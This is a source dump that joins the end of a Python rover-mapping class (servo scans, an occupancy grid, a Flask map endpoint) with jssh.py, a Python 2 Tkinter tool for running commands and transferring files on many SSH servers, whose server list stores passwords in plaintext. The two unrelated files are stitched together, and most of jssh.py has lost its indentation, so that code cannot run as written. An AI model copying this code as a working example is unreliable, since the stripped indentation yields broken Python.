        # PWM controller drives the scanner servo at 60 Hz.
        self.pwm = Adafruit_PCA9685.PCA9685(I2C_ADDR_PWM_CONTROLLER)
        self.pwm.set_pwm_freq(60)
        # self.wheels = TrackController(GPIO_PIN_WHEEL_ENCODER_INT, mot_addr=I2C_ADDR_WHEEL_CONTROLLER,
        #                               enc_addr=I2C_ADDR_WHEEL_ENCODERS)
        self.scanner = Scanner(self.pwm, sensor_addr=I2C_ADDR_FORWARD_DISTANCE, pwm_servo_index=PWM_FORWARD_SCANNER,
                               servo_pulse_min=FORWARD_SCANNER_PULSE_MIN, servo_pulse_max=FORWARD_SCANNER_PULSE_MAX,
                               servo_degrees_min=FORWARD_SCANNER_DEGREES_MIN,
                               servo_degrees_max=FORWARD_SCANNER_DEGREES_MAX)
        # Globals
        self.position = (0, 0)  # cartesian map coordinates
        self.rotation = 90  # polar degree 0 points towards 'east' cartesian (∞,0) rex starts pointed 'north' on map
        # Get Map: reuse the named map from config if it exists, else create it.
        try:
            default_map_name = Config.get('map', 'name')
        except ConfigParser.NoSectionError:
            default_map_name = 'default'
        session = self.DBSession()
        default_map = session.query(Map).filter(Map.name == default_map_name).one_or_none()
        if default_map is not None:
            self.map = default_map
        else:
            log.info('Creating new map [{0}]'.format(default_map_name))
            new_map = Map(name=default_map_name, scale=50)
            session.add(new_map)
            session.commit()
            self.map = new_map
        log.info('Using map {0}'.format(self.map))
        # Start API in a background thread so scanning can proceed.
        self.api_thread = threading.Thread(target=self.run_api)
        self.api_thread.start()

    def run(self):
        """Perform one scan, persist its hit/miss cells, then exit the process."""
        session = self.DBSession()
        val = self.do_scan()
        session.add(val)
        session.commit()
        hits, misses = self.make_map_cells(val)
        log.info("Updating Hits")
        session.bulk_save_objects(hits)
        session.commit()
        # NOTE(review): hits[0]/misses[0] raise IndexError when a scan produced
        # no valid readings — confirm whether an empty scan is possible here.
        log.info(hits[0])
        log.info("Updating Misses")
        session.bulk_save_objects(misses)
        session.commit()
        log.info(misses[0])
        log.info("Done")
        exit()

    def do_scan(self, scan_count=1, rescan_tries=5):
        """Run one servo sweep and return an (unpersisted) Scan row.

        :param scan_count: number of samples averaged per angle (quality).
        :param rescan_tries: retries per angle on a failed reading.
        """
        log.info("Starting Scan Quality[{0}]".format(scan_count))
        new_scan = Scan(x=self.position[0], y=self.position[1], rotation=self.rotation, quality=scan_count)
        raw_scan = self.scanner.do_scan(scan_count=scan_count, rescan_tries=rescan_tries)
        results = []
        # raw_scan is indexed by angle in degrees; None means no reading at that angle.
        for deg, measurement in enumerate(raw_scan):
            if measurement is not None:
                results.append(ScanResult(angle=deg, distance=measurement))
        new_scan.scan_results = results
        return new_scan

    def make_map_cells(self, scan):
        """Convert a Scan's polar results into (hit_cells, miss_cells) MapCell lists.

        Each reading is traced from the rover's position with Bresenham's
        line: the final point is a hit (obstacle), all points before it are
        misses (free space).  Misses are deduplicated across rays.
        """
        hits = []
        misses = []
        for result in scan.scan_results:
            # BUG FIX: was 'result.distance is not -1' — an identity test against
            # an int literal, which only works via CPython small-int caching and
            # is a SyntaxWarning on Python 3.8+.  Use value inequality.
            if result.distance != -1:
                point1 = self.position
                # Scale distance into map cells; rotate by the rover's heading.
                cart = pol2cart(result.distance / self.map.scale, numpy.radians(result.angle + (self.rotation - 90)))
                point2 = (cart[0] + self.position[0], cart[1] + self.position[1])
                line_points = bresenham(point1, point2)
                hit = line_points.path.pop()  # last cell on the ray is the obstacle
                hits.append(hit)
                for line_point in line_points.path:
                    misses.append(line_point)
        misses_dup_len = len(misses)
        misses = set(misses)
        log.info("Found Misses: {0} ({1}) Hits: {2}".format(len(misses), misses_dup_len, len(hits)))
        hit_cells = []
        for hit in hits:
            hit_cell = MapCell(map=self.map, x=hit[0], y=hit[1], hit=True, scan=scan)
            hit_cells.append(hit_cell)
        miss_cells = []
        for miss in misses:
            miss_cell = MapCell(map=self.map, x=miss[0], y=miss[1], hit=False, scan=scan)
            miss_cells.append(miss_cell)
        return hit_cells, miss_cells

    def get_map_dimensions(self):
        """Return ((min_x, min_y), (max_x, max_y)) over all stored MapCells."""
        session = self.DBSession()
        max_x = session.query(MapCell.x.label('x')).order_by(MapCell.x.desc()).first().x
        min_x = session.query(MapCell.x.label('x')).order_by(MapCell.x.asc()).first().x
        max_y = session.query(MapCell.y.label('y')).order_by(MapCell.y.desc()).first().y
        min_y = session.query(MapCell.y.label('y')).order_by(MapCell.y.asc()).first().y
        return (min_x, min_y), (max_x, max_y)

    def get_map(self):
        """Return the occupancy grid as a 2-D list indexed [x][y].

        Each cell holds the hit probability (hits / observations) for that
        coordinate, or None where the cell was never observed.
        """
        map_min, map_max = self.get_map_dimensions()
        session = self.DBSession()
        # p = sum(hit == TRUE) / count(observations) per (x, y) cell.
        map_query = session.query(MapCell.x.label('x'),
                                  MapCell.y.label('y'),
                                  (func.sum(case({'TRUE': 1.0},
                                                 value=MapCell.hit,
                                                 else_=0.0)) / func.count(MapCell.hit)).label('p')). \
            group_by(MapCell.x, MapCell.y)
        w = map_max[0] - map_min[0]
        h = map_max[1] - map_min[1]
        map_grid = [[None for _ in range(h + 1)] for _ in range(w + 1)]
        for cell in map_query.all():
            map_grid[cell.x - map_min[0]][cell.y - map_min[1]] = cell.p
        return map_grid

    def make_text_map(self, map_grid):
        """Render an occupancy grid (as built by get_map) into ASCII art.

        ' ' = unobserved, '*' = certain hit (p == 1), digit = int(p * 10).
        Rows are emitted top-to-bottom, so the highest y prints first.
        """
        w = len(map_grid)
        h = len(map_grid[0])
        line = ''
        for y in range(h):
            for x in range(w):
                cell = map_grid[x][h - y - 1]
                if cell is None:
                    line += ' '
                elif cell == 1:
                    line += '*'
                else:
                    line += str(int(cell * 10))
            line += '\n'
        return line

    def run_api(self):
        """Serve the rendered map at /map on all interfaces (blocking)."""
        app = Flask(__name__)

        @app.route("/map")
        def hello():
            map_grid = self.get_map()
            return self.make_text_map(map_grid)

        app.run(host='0.0.0.0')
|
jssh.py | # -*- coding: utf-8 -*-
# Error messages are shown in a popup window
# Reworked the multithreading
# Optimized the execution-progress display
from Tkinter import *
from tkFileDialog import *
from threading import Thread,Semaphore
from datetime import datetime
import gl
from server import *
from ttk import Combobox
from tkFont import Font,NORMAL
# import atexit
from signal import signal,SIGTERM,SIGINT
import sys
import os
from cPickle import dump,load
from time import *
import platform
import re
# import tkMessageBox
def main():
reload(sys)
sys.setdefaultencoding('utf8')
def find_it(event, i):
target = "--------------------------------------%s\n" % i
where = text.search(target, '0.0', END)
if where:
pastit = where + ('+%dc' % len(target))
text.tag_add(SEL, where, pastit)
text.mark_set(INSERT, pastit)
text.see(INSERT)
text.focus()
def xshell(event,i):
if gl.server_all[i].connect_status:
shell = gl.server_all[i].ssh.invoke_shell()
def send_ctrl_c(event):
shell.send('\x03')
def single_exec_cmd(event, i):
cmd = xshell_entry.get()
if cmd:
shell.send(cmd+'\x0a')
xshell_entry.delete(0, END)
else:
shell.send('\x0a')
xshell_top=Toplevel()
xshell_top.attributes("-topmost", 1)
xshell_top.title("%s@%s"%(gl.server_all[i].username,i))
def on_closing():
shell.close()
xshell_top.destroy()
xshell_top.protocol("WM_DELETE_WINDOW", on_closing)
xshell_text = Text(xshell_top, bg='black', fg='green')
xshell_scroll = Scrollbar(xshell_top, command=xshell_text.yview)
xshell_text.configure(yscrollcommand=xshell_scroll.set)
xshell_scroll.pack(side=RIGHT, fill=Y)
xshell_text.pack(fill=BOTH,expand=YES)
xshell_Label=Label(xshell_top, text="command:")
xshell_Label.pack(side=LEFT)
xshell_entry = Entry(xshell_top, insertbackground='green', width=50)
xshell_entry.bind('<Key-Return>',lambda event,i=i:single_exec_cmd(event,i))
xshell_entry.bind('<Control-c>', send_ctrl_c)
xshell_entry.pack(fill=X)
def put_resoult():
sleep(1)
while True:
try:
xshell_text.insert(END,re.sub('\[.*?m','',shell.recv(1024)))
sleep(0.1)
xshell_text.see(END)
except:
break
Thread(target=put_resoult).start()
else:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR")
err_text = Label(tl, bg='black', fg='red',width=50, height=10, text="The host is not be connected!\n")
err_text.pack(fill=BOTH)
def open_list():
# 选择服务器清单
fd = askopenfilename(initialdir='.')
if fd:
save_log(log='%s open list %s\n' % (datetime.now(), fd))
root.title('Current file list:%s' % fd)
try:
server_list = open(fd)
except:
text.insert(END, "open file failed !\n")
server_list=None
if server_list:
gl.server_all.clear()
if any(gl.cbuts):
for i in gl.cbuts.keys():
gl.cbuts[i].destroy()
gl.cbuts.clear()
for (num, value) in enumerate(server_list):
if len(value) > 4 and not value.startswith('#'):
try:
hostname = value.split()[0]
except:
pass
try:
ipinfo = value.split()[1]
ip_addr = ipinfo.split(":")[0]
except:
pass
try:
if gl.server_all[hostname]:
err='ERROR,At line %s:Duplicate hostname %s\n' % (num,hostname)
text.insert(END, err)
save_log(log=err)
except:
pass
try:
if gl.server_all[hostname].ip_addr+":"+gl.server_all[hostname].port:
err='ERROR,At line %s:Duplicate ip and port %s\n' % (num,ipinfo)
text.insert(END, err)
save_log(log=err)
except:
pass
try:
try:
port = int(ipinfo.split(":")[1])
except:
port = 22
username = value.split()[2]
password = value.split()[3]
gl.server_all[hostname] = server(ip=ip_addr, port=port, username=username, password=password)
gl.server_all[hostname].selected = IntVar()
gl.cbuts[hostname] = (Checkbutton(listframe, text=hostname, font=ft, bg='black', foreground="blue", variable=gl.server_all[hostname].selected))
gl.cbuts[hostname].select()
gl.cbuts[hostname].pack()
gl.cbuts[hostname].bind("<Button-3>", lambda event, i=hostname:find_it(event, i))
gl.cbuts[hostname].bind("<Control-Button-1>", lambda event, i=hostname:xshell(event, i))
except IndexError:
err = 'ERROR,At line %s,wrong host info: %s\n' % (num + 1, value)
text.insert(END, err)
save_log(log=err)
server_list.close()
disconnect['state'] = DISABLED
if any(gl.server_all):
connect['state'] = ACTIVE
cmd_log.flush()
def connect():
try:
thread_num=int(thread_num_entry.get())
except:
thread_num=int(10)
semaphore= Semaphore(thread_num)
def connect_do(i):
if semaphore.acquire():
gl.server_all[i].connect()
semaphore.release()
connect['state'] = DISABLED
text.insert(END,'Connecting,Please wait ...\n')
threads = []
for i in gl.server_all.keys():
if gl.server_all[i].selected.get() == 1:
if gl.server_all[i].connect_status:
pass
else:
i = Thread(target=connect_do,args=(i,),name=i)
i.start()
threads.append(i)
sleep(0.02)
root.update()
while True:
for a in threads:
sleep(0.02)
root.update()
if not a.isAlive():
sleep(0.02)
root.update()
if gl.server_all[a.getName()].err:
gl.cbuts[a.getName()]['foreground'] = "red"
try:
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
except:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR")
# def closetl():
# err_topped=False
# tl.protocol("WM_DELETE_WINDOW",closetl)
err_text = Text(tl, bg='black', fg='red')
err_scroll = Scrollbar(tl, command=err_text.yview)
err_text.configure(yscrollcommand=err_scroll.set)
err_scroll.pack(side=RIGHT, fill=Y)
err_text.pack(fill=BOTH,expand=YES)
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
sleep(0.02)
root.update()
threads.remove(a)
if gl.server_all[a.getName()].connect_status:
gl.cbuts[a.getName()]['foreground'] = "green"
gl.connected = True
sleep(0.02)
root.update()
threads.remove(a)
if not threads:
text.insert(END,'Connect completed\n')
#tkMessageBox.showinfo("Complete!", "Connect Complete!")
break
if gl.connected:
disconnect['state'] = ACTIVE
command_but['state'] = ACTIVE
file_but['state'] = DISABLED
connect['state'] = ACTIVE
def disconnect():
disconnect['state']=DISABLED
try:
thread_num=int(thread_num_entry.get())
except:
thread_num=int(10)
semaphore= Semaphore(thread_num)
def disconnect_do(i):
if semaphore.acquire():
gl.server_all[i].close()
semaphore.release()
if gl.connected:
threads = []
for i in gl.server_all.keys():
if gl.server_all[i].selected.get() == 1:
gl.cbuts[i]['foreground'] = "blue"
i = Thread(target=disconnect_do,args=(i,),name=i)
i.start()
sleep(0.02)
root.update()
threads.append(i)
for a in threads:
a.join()
gl.connected = False
for r in gl.server_all.keys():
if gl.server_all[r].connect_status:
gl.connected = True
if gl.connected:
disconnect['state'] = ACTIVE
command_but['state'] = ACTIVE
file_but['state'] = DISABLED
else:
disconnect['state'] = DISABLED
connect['state'] = ACTIVE
command_but['state'] = DISABLED
file_but['state'] = ACTIVE
def gexe_cmd():
try:
thread_num=int(thread_num_entry.get())
except:
thread_num=int(10)
semaphore= Semaphore(thread_num)
def gexe_do(i,cmd):
if semaphore.acquire():
gl.server_all[i].exec_cmd(cmd)
semaphore.release()
command_but['state'] = DISABLED
gcmd = entry.get()
save_log(log='%s exec cmd: %s\n' % (datetime.now(), gcmd))
gl.history_cmd.reverse()
del gl.history_cmd[1000:]
gl.history_cmd.append(gcmd)
gl.history_cmd.reverse()
entry['values'] = gl.history_cmd
history_file = open(gl.history_file, 'w')
dump(gl.history_cmd, history_file)
history_file.close()
threads = []
wait_t = Toplevel()
wait_t.attributes("-topmost", 1)
wait_t.title("exec command:%s" % gcmd)
w_text = Text(wait_t, bg='black', fg='green')
w_scroll = Scrollbar(wait_t, command=w_text.yview)
w_text.configure(yscrollcommand=w_scroll.set)
w_scroll.pack(side=RIGHT, fill=Y)
w_text.pack(fill=BOTH,expand=YES)
sleep(0.02)
clear()
root.update()
for i in gl.server_all.keys():
if gl.server_all[i].selected.get() == 1:
try:
w_text.insert(END,'%s\n' % i)
except:
pass
gl.cbuts[i]['foreground'] = "green"
#a = Thread(target=gl.server_all[i].exec_cmd,kwargs={'cmd':"LANG=zh_CN.UTF-8;%s" % gcmd},name=i)
a = Thread(target=gexe_do,kwargs={'i':i,'cmd':gcmd},name=i)
a.start()
sleep(0.02)
root.update()
threads.append(a)
command_but['state'] = ACTIVE
while True:
for a in threads:
sleep(0.02)
root.update()
if not a.isAlive():
sleep(0.02)
root.update()
if gl.server_all[a.getName()].err:
gl.cbuts[a.getName()]['foreground'] = "red"
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
if where:
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
try:
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
sleep(0.02)
root.update()
except:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR:execcmd %s" % gcmd)
err_text = Text(tl, bg='black', fg='red')
err_scroll = Scrollbar(tl, command=err_text.yview)
err_text.configure(yscrollcommand=err_scroll.set)
err_scroll.pack(side=RIGHT, fill=Y)
err_text.pack(fill=BOTH,expand=YES)
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
sleep(0.02)
root.update()
if gl.server_all[a.getName()].result:
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
text.insert(END, gl.server_all[a.getName()].result)
text.see(END)
save_log(log=gl.server_all[a.getName()].result)
sleep(0.02)
root.update()
if not gl.server_all[a.getName()].result and not gl.server_all[a.getName()].err:
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
if where:
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
sleep(0.02)
gl.server_all[a.getName()].err = ''
gl.server_all[a.getName()].result = ''
threads.remove(a)
if not threads:
break
text.insert(END, "######################all the servers finished execcmd:%s (%s)\n" % (gcmd,datetime.now()))
save_log(log="######################all the servers finished execcmd:%s (%s)\n" % (gcmd,datetime.now()))
try:
if w_text.get(0.0,END).split():
pass
else:
wait_t.destroy()
except:
pass
cmd_log.flush()
#tkMessageBox.showinfo("Complete!", "exec cmd :\n %s \n Complete!" % gcmd)
def get_ui():
global getfile_top
getfile_top = Toplevel(root)
getfile_top.attributes("-topmost", 1)
getfile_top.title("get file")
get_remote = Label(getfile_top, text="remote file:")
get_remote.grid(row=0, column=0)
global get_re
get_re = Entry(getfile_top, insertbackground='green', width=50)
get_re.grid(row=0, column=1)
get_locate = Label(getfile_top, text="local dir:")
get_locate.grid(row=1, column=0)
global get_lo
get_lo = Entry(getfile_top, insertbackground='green', width=50)
get_lo.grid(row=1, column=1)
def get_file_select():
get_filename=askdirectory()
get_lo.delete(0, END)
get_lo.insert(END,get_filename)
get_select_but=Button(getfile_top,text='...',command=get_file_select)
get_select_but.grid(row=1,column=2)
getfile_sub_but = Button(getfile_top, text='get', command=get_file)
getfile_sub_but.grid(row=2)
def get_file():
try:
thread_num=int(thread_num_entry.get())
except:
thread_num=int(10)
semaphore= Semaphore(thread_num)
def get_do(i,lo_path,re_file,FileSend):
if semaphore.acquire():
gl.server_all[i].FileTransfer(lo_path=lo_path,re_file=re_file,FileSend=FileSend)
semaphore.release()
re_file=get_re.get()
lo_file=get_lo.get()
if re_file and lo_file:
try:
gl.thread_num=int(thread_num_entry.get())
except:
gl.thread_num=int(10)
save_log(log='%s get file: %s\n' % (datetime.now(), re_file))
threads = []
wait_t = Toplevel()
wait_t.attributes("-topmost", 1)
wait_t.title("Get file:%s --> %s" % (re_file,lo_file))
w_text = Text(wait_t, bg='black', fg='green')
w_scroll = Scrollbar(wait_t, command=w_text.yview)
w_text.configure(yscrollcommand=w_scroll.set)
w_scroll.pack(side=RIGHT, fill=Y)
w_text.pack(fill=BOTH,expand=YES)
sleep(0.02)
root.update()
clear()
getfile_top.destroy()
for i in gl.server_all.keys():
if gl.server_all[i].selected.get() == 1:
w_text.insert(END,'%s\n' % i)
a = Thread(target=get_do,kwargs={'i':i,'lo_path':lo_file,'re_file':re_file,'FileSend':0},name=i)
a.start()
threads.append(a)
sleep(0.02)
root.update()
while True:
for a in threads:
sleep(0.02)
root.update()
if not a.isAlive():
sleep(0.02)
root.update()
if gl.server_all[a.getName()].err:
gl.cbuts[a.getName()]['foreground'] = "red"
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
if where:
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
try:
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
sleep(0.02)
root.update()
except:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR:get file %s --> %s (%s)\n" % (re_file,lo_file,datetime.now()))
err_text = Text(tl, bg='black', fg='red')
err_scroll = Scrollbar(tl, command=err_text.yview)
err_text.configure(yscrollcommand=err_scroll.set)
err_scroll.pack(side=RIGHT, fill=Y)
err_text.pack(fill=BOTH,expand=YES)
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
sleep(0.02)
root.update()
threads.remove(a)
elif gl.server_all[a.getName()].get_file_status:
try:
where = w_text.search('%s' % a.getName(), '0.0', END)
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
text.insert(END, "get file %s %s\n" % (re_file, gl.server_all[a.getName()].get_file_status))
save_log(log="get file %s %s\n" % (re_file, gl.server_all[a.getName()].get_file_status))
gl.server_all[a.getName()].result = ''
sleep(0.02)
root.update()
threads.remove(a)
if not threads:
break
text.insert(END, "######################all the servers finished get file:%s --> %s (%s)\n" % (re_file,lo_file,datetime.now()))
save_log(log="######################all the servers finished get file:%s --> %s (%s)\n" % (re_file,lo_file,datetime.now()))
if w_text.get(0.0, END).split():
pass
else:
wait_t.destroy()
cmd_log.flush()
#tkMessageBox.showinfo("Complete!", "get file:\n %s \n Complete!" % re_file)
else:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR:get file %s --> %s (%s)\n" % (re_file,lo_file,datetime.now()))
err_text = Label(tl, bg='black', fg='red',width=100, height=10, text="ERROR:There is no file name or path name!")
err_text.pack(fill=BOTH)
def send_ui():
global sendfile_top
sendfile_top = Toplevel()
sendfile_top.attributes("-topmost", 1)
sendfile_top.title("send file")
send_remote = Label(sendfile_top, text="remote file:")
send_remote.grid(row=0, column=0)
global send_re
send_re = Entry(sendfile_top, insertbackground='green', width=50)
send_re.grid(row=0, column=1)
def send_file_select():
send_filename=askopenfilename()
send_lo.delete(0, END)
send_lo.insert(END,send_filename)
send_re.delete(0,END)
send_re.insert(END,"/tmp/"+os.path.split(send_filename)[-1])
send_select_but=Button(sendfile_top,text='...',command=send_file_select)
send_select_but.grid(row=1,column=2)
send_locate = Label(sendfile_top, text="local file:")
send_locate.grid(row=1, column=0)
global send_lo
send_lo = Entry(sendfile_top, insertbackground='green', width=50)
send_lo.grid(row=1, column=1)
sendfile_sub_but = Button(sendfile_top, text='send', command=send_file)
sendfile_sub_but.grid(row=2)
def send_file():
try:
thread_num=int(thread_num_entry.get())
except:
thread_num=int(10)
semaphore= Semaphore(thread_num)
def send_do(i,lo_file,re_file,FileSend):
if semaphore.acquire():
gl.server_all[i].FileTransfer(lo_file=lo_file,re_file=re_file,FileSend=FileSend)
semaphore.release()
re_file=send_re.get()
lo_file=send_lo.get()
if re_file and lo_file:
try:
gl.thread_num=int(thread_num_entry.get())
except:
gl.thread_num=int(10)
save_log(log='%s send file: %s --> %s \n' % (datetime.now(), lo_file, re_file))
threads = []
wait_t = Toplevel()
wait_t.attributes("-topmost", 1)
wait_t.title("Send file:%s --> %s" % (lo_file, re_file))
w_text = Text(wait_t, bg='black', fg='green')
w_scroll = Scrollbar(wait_t, command=w_text.yview)
w_text.configure(yscrollcommand=w_scroll.set)
w_scroll.pack(side=RIGHT, fill=Y)
w_text.pack(fill=BOTH,expand=YES)
sleep(0.02)
root.update()
clear()
sendfile_top.destroy()
for i in gl.server_all.keys():
if gl.server_all[i].selected.get() == 1:
w_text.insert(END,'%s\n' % i)
a = Thread(target=send_do,kwargs={'i':i,'lo_file':lo_file,'re_file':re_file,'FileSend':1},name=i)
a.start()
threads.append(a)
sleep(0.02)
root.update()
while True:
for a in threads:
sleep(0.02)
root.update()
if not a.isAlive():
sleep(0.02)
root.update()
if gl.server_all[a.getName()].err:
gl.cbuts[a.getName()]['foreground'] = "red"
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
if where:
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
try:
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
sleep(0.02)
root.update()
except:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR:send file %s --> %s (%s)\n" % (lo_file,re_file,datetime.now()))
err_text = Text(tl, bg='black', fg='red')
err_scroll = Scrollbar(tl, command=err_text.yview)
err_text.configure(yscrollcommand=err_scroll.set)
err_scroll.pack(side=RIGHT, fill=Y)
err_text.pack(fill=BOTH,expand=YES)
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
sleep(0.02)
root.update()
threads.remove(a)
elif gl.server_all[a.getName()].send_file_status:
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
text.insert(END, "send file %s --> %s %s\n" % (lo_file, re_file, gl.server_all[a.getName()].send_file_status))
save_log(log="send file %s --> %s %s\n" % (lo_file, re_file, gl.server_all[a.getName()].send_file_status))
gl.server_all[a.getName()].result = ''
sleep(0.02)
root.update()
threads.remove(a)
if not threads:
break
text.insert(END, "######################all the servers finished send file:%s --> %s (%s)\n" % (lo_file,re_file,datetime.now()))
save_log(log="######################all the servers finished send file:%s --> %s (%s)\n" % (lo_file,re_file,datetime.now()))
if w_text.get(0.0, END).split():
pass
else:
wait_t.destroy()
cmd_log.flush()
#tkMessageBox.showinfo("Complete!", "send file:\n %s \n Complete!" % lo_file)
else:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR:send file %s --> %s (%s)\n" % (lo_file,re_file,datetime.now()))
err_text = Label(tl, bg='black', fg='red',width=100, height=10, text="ERROR:There is no file name or path name!")
err_text.pack(fill=BOTH)
# gui
class AutocompleteCombobox(Combobox):
def set_completion_list(self, completion_list):
"""Use our completion list as our drop down selection menu, arrows move through menu."""
self._completion_list = sorted(completion_list, key=str.lower) # Work with a sorted list
self._hits = []
self._hit_index = 0
self.position = 0
self.bind('<KeyRelease>', self.handle_keyrelease)
self['values'] = self._completion_list # Setup our popup menu
def autocomplete(self, delta=0):
if delta:
self.delete(self.position, END)
else:
self.position = len(self.get())
_hits = []
for element in self._completion_list:
if element.lower().startswith(self.get().lower()):
_hits.append(element)
if _hits != self._hits:
self._hit_index = 0
self._hits = _hits
if _hits == self._hits and self._hits:
self._hit_index = (self._hit_index + delta) % len(self._hits)
if self._hits:
self.delete(0, END)
self.insert(0, self._hits[self._hit_index])
self.select_range(self.position, END)
def handle_keyrelease(self, event):
# if event.keysym == "BackSpace":
# self.delete(self.index(INSERT), END)
# self.position = self.index(END)
# if event.keysym == "Left":
# if self.position < self.index(END):
# self.delete(self.position, END)
# else:
# self.position = self.position - 1
# self.delete(self.position, END)
if event.keysym == "Right":
self.position = self.index(END)
if len(event.keysym) == 1:
self.autocomplete()
class FullScreenApp(object):
def __init__(self, master, **kwargs):
self.root = master
# self.tk.attributes('-zoomed', True) # This just maximizes it so we can see the window. It's nothing to do with fullscreen.
self.frame = Frame(self.root)
self.frame.pack()
self.state = False
self.root.bind("<F11>", self.toggle_fullscreen)
self.root.bind("<Escape>", self.end_fullscreen)
def toggle_fullscreen(self, event=None):
self.state = not self.state # Just toggling the boolean
self.root.attributes("-fullscreen", self.state)
return "break"
def end_fullscreen(self, event=None):
self.state = False
self.root.attributes("-fullscreen", False)
return "break"
# Tk root window, shutdown handling and per-platform data-file locations.
root = Tk()

def close_all():
    """Close every live server connection, then tear down the UI."""
    for server in gl.server_all.values():
        if server.connect_status:
            server.close()
    root.destroy()

root.protocol("WM_DELETE_WINDOW", close_all)
root.option_add('*background', 'black')
root.option_add('*foreground', 'green')
root.title('jssh')

if platform.system() == 'Linux':
    jssh_home = os.environ['HOME'] + "/jssh"
    try:
        os.makedirs(jssh_home)
    except OSError:
        # Directory already exists (or cannot be created); keep going and let
        # the later file operations surface any real problem. The original
        # bare `except:` also swallowed KeyboardInterrupt/SystemExit.
        pass
    gl.logfile = jssh_home + '/log.txt'
    gl.history_file = jssh_home + '/history.data'
elif platform.system() == 'Windows':
    try:
        os.makedirs(r'c:\jssh')
    except OSError:
        pass
    gl.logfile = r'c:\jssh\log.txt'
    gl.history_file = r'c:\jssh\history.data'
else:
    # NOTE(review): gl.logfile / gl.history_file stay unset on this branch,
    # so the file accesses below will fail on unsupported platforms.
    print('system type is not supported')

# Seed the history file with two sample commands (pickle protocol-0 text)
# if it does not exist yet.
if not os.path.isfile(gl.history_file):
    with open(gl.history_file, 'w') as seed:
        seed.write('''(lp1
S'df -h'
p2
aS'ifconfig'
a.
''')
#root.iconbitmap(default='jssh.ico')
# Menu bar
def open_logfile():
    """Show the command log in a scrollable text window."""
    #os.system('notepad %s' % gl.logfile)
    tl = Toplevel()
    tl.title("Log")
    log_text = Text(tl, bg='black', fg='green')
    log_scroll = Scrollbar(tl, command=log_text.yview)
    log_text.configure(yscrollcommand=log_scroll.set)
    log_scroll.pack(side=RIGHT, fill=Y)
    log_text.pack(fill=BOTH, expand=YES)
    # `file()` is a Python-2-only builtin, and the handle leaked whenever an
    # insert raised; use open() inside a with-block instead.
    with open(gl.logfile) as log:
        for line in log:
            log_text.insert(END, line)
    # Scroll to the newest entry once everything is loaded.
    log_text.see(END)
def help():
    """Pop up a topmost window with the usage notes.

    NOTE: this deliberately keeps the name `help` (shadowing the builtin)
    because the menu bar below registers it by that name.
    """
    # Fixed the user-facing typos "frist" -> "first" and "formate" -> "format".
    help_msg = '''
You should create server-list file first:
format:hostname ip:port username password
eg:hostname 192.168.1.10:22 root password
use utf-8 format better,one server one line
Use Ctrl + left-click a server that can be manipulated separately.
Use right-click on a server you can find it in the results.
F11 for full screen!
'''
    ht = Toplevel()
    ht.attributes("-topmost", 1)
    # The Label handle is not needed afterwards (pack() returns None anyway).
    Label(ht, text=help_msg, justify="left").pack()
# Top menu bar: one command entry per tool action.
menubar = Menu(root)
for item_label, item_command in (
        ("send file", send_ui),
        ("get file", get_ui),
        ("log", open_logfile),
        ("help", help),
        ("exit", close_all)):
    menubar.add_command(label=item_label, command=item_command)
root.config(menu=menubar)
# Command input area
command_frame = Frame(root, bd=1, relief=SUNKEN)
